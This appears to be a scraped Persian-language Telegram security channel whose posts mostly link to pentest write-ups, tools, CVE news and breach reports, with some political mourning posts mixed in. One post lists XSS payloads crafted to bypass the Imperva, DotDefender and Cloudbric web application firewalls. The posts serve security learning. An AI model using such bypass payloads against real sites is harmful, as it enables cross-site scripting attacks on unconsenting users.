This media is not supported in your browser
VIEW IN TELEGRAM
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
روش های بکارگیری هش های NTLM
#windows
#pentest
#privesc
@sec_nerd
روش های بکارگیری هش های NTLM
#windows
#pentest
#privesc
@sec_nerd
ropnop blog
Practical Usage of NTLM Hashes
I’ve shown all the different ways to own a Windows environment when you have a password - but having a hash is just as good! Don’t bother cracking - PTH!
waf bypass
- Imperva
<a69/onclick=write()>pew
- DotDefender
<a69/onclick=[0].map(alert)>pew
- Cloudbric
<a69/onclick=[1].findIndex(alert)>pew
#bugbounty
#WAF
#pentest
@sec_nerd
- Imperva
<a69/onclick=write()>pew
- DotDefender
<a69/onclick=[0].map(alert)>pew
- Cloudbric
<a69/onclick=[1].findIndex(alert)>pew
#bugbounty
#WAF
#pentest
@sec_nerd
کشف ساب دامین با استفاده از Turbolist3r
https://github.com/fleetcaptain/Turbolist3r
#subdomain
#web
#pentest
@sec_nerd
https://github.com/fleetcaptain/Turbolist3r
#subdomain
#web
#pentest
@sec_nerd
با موضوع Search Hijacking چقدر آشنایی دارید؟
اخیرا مجموعه ای از شرکت های پوششی چینی کشف شده اند که در قالب افزونه های گوگل کروم و تحت عناوین سرچ امن و سرچ رمزنگاری شده و ... اقدام به هایجک کردن نتایج جستجوی کاربران میکنند.
این کمپین که افزونه های متعددی در گوگل دارد، نزدیک به ۷ میلیون کاربر را در جهان آلوده کرده و درآمدی نزدیک به ۲۵۰ میلیون دلار در سال از این طریق بدست آورده است.
روش کار بدین صورت است که کاربر با جستجوی یک عبارت منتظر دریافت نتایج از گوگل می ماند اما افزونه ی آلوده اقدام به دستکاری درخواست او کرده و برخی از تبلیغات مدنظر خود را به آن اضافه میکند و درخواست را به سمت مایکروسافت میفرستد. در این وضع موتور جستجوی مایکروسافت، هم نتایج جستجو را برمیگرداند و هم هزینه این تبلیغات را بدون آنکه اطلاعی داشته باشد به جیب کلاهبرداران میریزد.
تبلیغات مورد اشاره از شرکت های بزرگ امریکایی مانند آمازون، امریکن اکسپرس، کوکاکولا، اچ پی، والمارت و ... هستند و هربار کاربر باید در صفحات جستجوی خود تعداد زیادی از این تبلیغات را برای دیدن نتایج اصلی مدنظر پشت سر بگذارد.
اطلاعات و جزییات بیشتر:
https://medium.com/against-surveillance-capitalism/how-a-chinese-company-built-a-250-million-search-hijacking-empire-35f957566852
#news
#google
#chrome
#search_hijacking
@sec_nerd
#news
#search_hijacking
#google
#microsoft
@sec_nerd
اخیرا مجموعه ای از شرکت های پوششی چینی کشف شده اند که در قالب افزونه های گوگل کروم و تحت عناوین سرچ امن و سرچ رمزنگاری شده و ... اقدام به هایجک کردن نتایج جستجوی کاربران میکنند.
این کمپین که افزونه های متعددی در گوگل دارد، نزدیک به ۷ میلیون کاربر را در جهان آلوده کرده و درآمدی نزدیک به ۲۵۰ میلیون دلار در سال از این طریق بدست آورده است.
روش کار بدین صورت است که کاربر با جستجوی یک عبارت منتظر دریافت نتایج از گوگل می ماند اما افزونه ی آلوده اقدام به دستکاری درخواست او کرده و برخی از تبلیغات مدنظر خود را به آن اضافه میکند و درخواست را به سمت مایکروسافت میفرستد. در این وضع موتور جستجوی مایکروسافت، هم نتایج جستجو را برمیگرداند و هم هزینه این تبلیغات را بدون آنکه اطلاعی داشته باشد به جیب کلاهبرداران میریزد.
تبلیغات مورد اشاره از شرکت های بزرگ امریکایی مانند آمازون، امریکن اکسپرس، کوکاکولا، اچ پی، والمارت و ... هستند و هربار کاربر باید در صفحات جستجوی خود تعداد زیادی از این تبلیغات را برای دیدن نتایج اصلی مدنظر پشت سر بگذارد.
اطلاعات و جزییات بیشتر:
https://medium.com/against-surveillance-capitalism/how-a-chinese-company-built-a-250-million-search-hijacking-empire-35f957566852
#news
#chrome
#search_hijacking
@sec_nerd
#news
#search_hijacking
#microsoft
@sec_nerd
Medium
How a Chinese Company Built a $250 Million Search Hijacking Empire
A publicly listed Chinese company has used a series of offshore shell companies to conceal their ownership of browser extensions that…
رمزگشایی فایل کانفیگ روتر tplink در اولین روز سال میلادی
https://medium.com/@LargeCardinal/decrypting-config-bin-files-for-tp-link-wr841n-wa855re-and-probably-more-676de396d724
#tplink
#network
@sec_nerd
https://medium.com/@LargeCardinal/decrypting-config-bin-files-for-tp-link-wr841n-wa855re-and-probably-more-676de396d724
#tplink
#network
@sec_nerd
🏴 انالله واناالیه راجعون
♣️ مرثیه امیر مومنان (ع) در غم شهادت مالڪ
مالڪ ، مالڪ چه بود! به خدا سوگند، اگر ڪوه بود ڪوهے بلند و بے همتابود، واگر صخره بود صخره ا ے سخت بود ڪه هیچ ستورے بر آن بر نمے آمد وهیچ مرغے به اوج آن نمے رسید.( حڪمت ۴۴۳/ نهج البلاغه)
شهادت سردار دلها، حاج قاسم سلیمانی تسلیت باد.
@sec_nerd
♣️ مرثیه امیر مومنان (ع) در غم شهادت مالڪ
مالڪ ، مالڪ چه بود! به خدا سوگند، اگر ڪوه بود ڪوهے بلند و بے همتابود، واگر صخره بود صخره ا ے سخت بود ڪه هیچ ستورے بر آن بر نمے آمد وهیچ مرغے به اوج آن نمے رسید.( حڪمت ۴۴۳/ نهج البلاغه)
شهادت سردار دلها، حاج قاسم سلیمانی تسلیت باد.
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
حضرت امیرالمومنین علی(ع): سنگ دشمن را از همان جایی كه پرت كرده، باز گردانید، كه شر را جز شر پاسخی نیست.
نهج البلاغه، حکمت 314
#انتقام_سخت
#hardRevenge
#severeRevenge
نهج البلاغه، حکمت 314
#انتقام_سخت
#hardRevenge
#severeRevenge
آسیب پذیری موجود در محصولات Webex و IOS XE سیسکو منجر به اجرای دستور از راه دور میشود!
این آسیب پذیری بدلیل عدم حفاظت کافی در برابر CSRF ایجاد میشود.
https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/
#cisco
#news
@sec_nerd
این آسیب پذیری بدلیل عدم حفاظت کافی در برابر CSRF ایجاد میشود.
https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/
#cisco
#news
@sec_nerd
Threat Post
Cisco Webex Bug Allows Remote Code Execution
Cisco patched two high-severity flaws this week, in its Webex and IOS XE Software products.
یک نمونه از حمله علیه Citrix برای سوء استفاده از آسیب پذیری شناسه CVE-2019-19781
https://support.citrix.com/article/CTX267027
#citrix
#network
@sec_nerd
https://support.citrix.com/article/CTX267027
#citrix
#network
@sec_nerd
https://www.webyeti.ninja/blog/hacktheboxeu-bitlab-walkthrough
hackthebox.eu: Bitlab Walkthrough
#HTB
#writeup
@sec_nerd
hackthebox.eu: Bitlab Walkthrough
#HTB
#writeup
@sec_nerd
WebYeti.ninja
hackthebox.eu: Bitlab Walkthrough — WebYeti.ninja
Time for more hackthebox.eu machines. Bitlab is a medium Linux box running a version of Gitlab with some issues. Enumeration and looking at code was a factor in this box as well as some eventual basic reverse engineering of a Windows executable. This box…
رایت آپهای مربوط به باگهای کشف شده در یاهو
link.medium.com/e6k3e4ria3
https://omespino.com/write-up-lovestory-from-closed-as-informative-to-xx00-usd-in-yahoo-ios-mail-app
https://link.medium.com/FkU7hCsia3
https://link.medium.com/hPxOyMsia3
https://sites.google.com/securifyinc.com/secblogs/yahoo-luminate-rce
https://link.medium.com/GfuvDkCia3
https://link.medium.com/gRCKuMCia3
https://link.medium.com/5ciC88Cia3
https://link.medium.com/R2CyBEDia3
#bugbounty
#yahoo
#writeup
@sec_nerd
link.medium.com/e6k3e4ria3
https://omespino.com/write-up-lovestory-from-closed-as-informative-to-xx00-usd-in-yahoo-ios-mail-app
https://link.medium.com/FkU7hCsia3
https://link.medium.com/hPxOyMsia3
https://sites.google.com/securifyinc.com/secblogs/yahoo-luminate-rce
https://link.medium.com/GfuvDkCia3
https://link.medium.com/gRCKuMCia3
https://link.medium.com/5ciC88Cia3
https://link.medium.com/R2CyBEDia3
#bugbounty
#yahoo
#writeup
@sec_nerd
Medium
My very first bug: a dreaded dupe and then an IDOR jackpot!
Hello fellow Hunter!,
یک دیتابیس ۲۲ گیگابایتی حاوی اطلاعات بیش از ۵۶ میلیون شهروند امریکایی بر روی یک سرور چینی کشف شد!
این اطلاعات شامل نام، آدرس، تلفن و سن است. به نظر میرسد این اطلاعات از یک وبسایت متعلق به فلوریدای امریکا با آدرس CheckPeople.com بدست آمده باشد.
https://www.theregister.co.uk/2020/01/09/checkpeoplecom_data_exposed/
#news
#breach
@sec_nerd
این اطلاعات شامل نام، آدرس، تلفن و سن است. به نظر میرسد این اطلاعات از یک وبسایت متعلق به فلوریدای امریکا با آدرس CheckPeople.com بدست آمده باشد.
https://www.theregister.co.uk/2020/01/09/checkpeoplecom_data_exposed/
#news
#breach
@sec_nerd
The Register
Why is a 22GB database containing 56 million US folks' personal details sitting on the open internet using a Chinese IP address?…
If CheckPeople could take a look at this, that would be great
امنیت اطلاعات
ابزار اسکن برای آسیب پذیری citrix CVE-2019-19781 https://github.com/trustedsec/cve-2019-19781/ #citrix #pentest @sec_nerd
https://github.com/lasersharkkiller/scripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1
ابزار پاورشل اسکنر آسیب پذیری citrix
CVE-2019-19781
#citrix
#tool
@sec_nerd
ابزار پاورشل اسکنر آسیب پذیری citrix
CVE-2019-19781
#citrix
#tool
@sec_nerd
GitHub
lasersharkkiller/security_stuff
Contribute to lasersharkkiller/security_stuff development by creating an account on GitHub.
شکستن هش های Citrix Netscaler با hashcat
https://github.com/hashcat/hashcat/commit/53105abeb47a6c325dee6714b1503cd68bd0c9c8
#hashcat
#citrix
@sec_nerd
https://github.com/hashcat/hashcat/commit/53105abeb47a6c325dee6714b1503cd68bd0c9c8
#hashcat
#citrix
@sec_nerd
پس از کشف آسیب پذیری در CryptoAPI ویندوز که از فایل Crypt32.dll ناشی میشود و به هکرها اجازه میدهد تا با اسپوف کردن یک سرتیفیکیت، بتوانند فایل اجرایی آلوده را ساین کنند، سازمان NSA با انتشار بیانیه ای با هشدار در خصوص این آسیب پذیری از کاربران خواست تا وصله ی امنیتی جدید برای رفع این مشکل را نصب کنند.
اما کارشناس معروف امنیتی اهل فرانسه معتقد است سازمان NSA به چند دلیل تصمیم گرفت آسیب پذیری ای را که خود کشف کرده بود برملا کند:
۱- این آسیب پذیری احتمالا آسیب پذیری سال نخواهد بود
۲- سازمان NSA به دنبال راهی ست تا خود را از فضاحت EternalBlue رهایی ببخشد
۳- این کار برای وجهه ی عمومی سازمان مناسب است.
۴- این تنها یکی از باگهایی ست که آنها کشف میکنند (نوک کوه یخ)
https://twitter.com/x0rz/status/1217176591765319680
#news
#windows
#nsa
#exploit
@sec_nerd
اما کارشناس معروف امنیتی اهل فرانسه معتقد است سازمان NSA به چند دلیل تصمیم گرفت آسیب پذیری ای را که خود کشف کرده بود برملا کند:
۱- این آسیب پذیری احتمالا آسیب پذیری سال نخواهد بود
۲- سازمان NSA به دنبال راهی ست تا خود را از فضاحت EternalBlue رهایی ببخشد
۳- این کار برای وجهه ی عمومی سازمان مناسب است.
۴- این تنها یکی از باگهایی ست که آنها کشف میکنند (نوک کوه یخ)
https://twitter.com/x0rz/status/1217176591765319680
#news
#windows
#nsa
#exploit
@sec_nerd